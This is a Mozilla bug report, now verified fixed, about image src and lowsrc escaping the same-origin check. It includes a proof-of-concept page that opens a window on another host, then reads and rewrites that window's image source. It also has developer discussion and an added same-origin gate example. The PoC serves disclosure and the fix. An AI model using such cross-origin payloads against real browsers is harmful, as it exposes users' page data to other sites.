Closed Bug 41230 Opened 24 years ago Closed 24 years ago

image SRC and LOWSRC are not checked for same origin as all.js said

Categories

(Core :: Security, defect, P3)

x86
All
defect

Tracking


VERIFIED FIXED

People

(Reporter: czhang, Assigned: security-bugs)

References


Details

(Whiteboard: [nsbeta2+])

load 6/01 build
1. go to http://cathyz/origin/image.html
2. click "hack image src"
3. wait for a while, see the src of image of another domain, and you are also able to change the src of the image.

the code is:

---------------http://cathyz/origin/image.html-------------------------
<html>
<head>
<script>
<!-- opens a window on another host (cathyz2), then after a delay reads and
     rewrites the src/lowsrc of that window's first image -->
var newin;
function getSrc() {
  newin=window.open("http://cathyz2/sameori/image.html","newinow");
  setTimeout("document.F1.T1.value='SRC value is ' + newin.document.images[0].src;", 6000);
  setTimeout("document.F1.T2.value='LOWSRC value is ' + newin.document.images[0].lowsrc;", 6000);
  setTimeout("newin.document.images[0].src='http://cathyz2/images/lowstar.gif';", 7000);
  setTimeout("newin.document.images[0].lowsrc='http://cathyz2/images/highstar.gif';", 7000);
}
</script>
</head>
<body>
<a href=javascript:void(0) onClick="getSrc()"> hack src of image</a>
<form name="F1">
<input type=text size=50 name="T1">
<br>
<input type=text size=50 name="T2">
</form>
</body>
</html>
OK... so you shouldn't be able to work with .src of an image in a window from a different domain. Should you be able to do _anything_ with images in a window from another domain -- even find out how many there are?
No. You are correct, Jesse.
Was bug 39083 somehow fixed without fixing this? It seems to me that they were the same bug (able to access document.images across domains), but mstoltz's 05/26/2000 16:28 checkin comments imply that bug 39083 was about innerHTML. Since I'm not that experienced with DOM (especially cross-window), I'm probably missing something fairly obvious.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Assigning QA to czhang
Hmm, we do have a check for htmlimageelement.src and .lowsrc, but that check doesn't seem to be happening here. I'm not sure why. Changing all properties to sameOrigin by default would fix this, but there may be a more localized solution if necessary. Marking as dependent on the safe-default bug, and nominating nsbeta2.
Status: NEW → ASSIGNED
Depends on: 28443
Keywords: nsbeta2
Target Milestone: --- → M17
nsbeta2+
Whiteboard: [nsbeta2+]
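The test case above reads and rewrites images[0].src and .lowsrc across hosts, and the previous comment suggests fixing it by making every property same-origin by default rather than adding per-property checks. The following is an added illustration of that safe-default gate, written for this page; it is not Mozilla's security manager code. originOf, canAccess, guardImage, replayScenario and the empty CROSS_ORIGIN_ALLOWED set are assumptions for the example, and the image object is a constructed stand-in for newin.document.images[0]; the hostnames cathyz and cathyz2 are the ones from the bug report.

```javascript
// Added example: a same-origin gate for DOM property access, in the spirit of
// the "all properties sameOrigin by default" fix discussed in this bug.
// Illustrative code only, not Mozilla's security manager; the function names
// and the CROSS_ORIGIN_ALLOWED list are assumptions for this example.

// An origin is scheme + host + port. URL.host keeps a non-default port and
// drops a default one, so http://cathyz and http://cathyz:8080 differ while
// http://cathyz and http://cathyz:80 are the same origin.
function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.host}`;
}

function isSameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// Properties that may be touched across origins. Leaving this empty is the
// safe default: anything not listed is same-origin only, so a property such
// as lowsrc cannot be missed by a forgotten per-property check.
const CROSS_ORIGIN_ALLOWED = new Set();

// May script running in scriptUrl use `property` on an object that belongs to
// the document at targetDocUrl?
function canAccess(scriptUrl, targetDocUrl, property) {
  if (isSameOrigin(scriptUrl, targetDocUrl)) return true;
  return CROSS_ORIGIN_ALLOWED.has(property);
}

// Wrap an image object so every read and write goes through canAccess.
function guardImage(img, scriptUrl, targetDocUrl) {
  const check = (prop, action) => {
    const name = `image.${String(prop)}`;
    if (!canAccess(scriptUrl, targetDocUrl, name)) {
      throw new Error(
        `Permission denied: ${action} ${name} from ${originOf(scriptUrl)} on ${originOf(targetDocUrl)}`
      );
    }
  };
  return new Proxy(img, {
    get(target, prop) { check(prop, "get"); return target[prop]; },
    set(target, prop, value) { check(prop, "set"); target[prop] = value; return true; },
  });
}

// Replay the bug's scenario: the opener's script runs at scriptUrl, the opened
// window's document lives at targetDocUrl. Returns what the script observed.
function replayScenario(scriptUrl, targetDocUrl) {
  // Constructed stand-in for newin.document.images[0]; not a real DOM node.
  const image = {
    src: "http://cathyz2/images/star.gif",
    lowsrc: "http://cathyz2/images/lowstar.gif",
  };
  const guarded = guardImage(image, scriptUrl, targetDocUrl);
  const result = { read: null, write: null, final: null };
  try { result.read = guarded.src; } catch (e) { result.read = "denied"; }
  try {
    guarded.src = "http://cathyz2/images/lowstar.gif";
    result.write = "allowed";
  } catch (e) { result.write = "denied"; }
  result.final = image.src; // read the unguarded object to see whether the write landed
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  // cross-origin (the bug's setup): both accesses are denied, src unchanged
  console.log(replayScenario("http://cathyz/origin/image.html", "http://cathyz2/sameori/image.html"));
  // same-origin: the read succeeds and the write lands
  console.log(replayScenario("http://cathyz2/origin/image.html", "http://cathyz2/sameori/image.html"));
}
```

With the allow-list empty, the cross-host replay denies both the read and the write and the image's src is untouched, while the same-host replay behaves as the test page expects. Loosening the policy for a specific property is then an explicit decision (adding it to CROSS_ORIGIN_ALLOWED) rather than something that happens because a check was never written.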
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
verified
Status: RESOLVED → VERIFIED
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?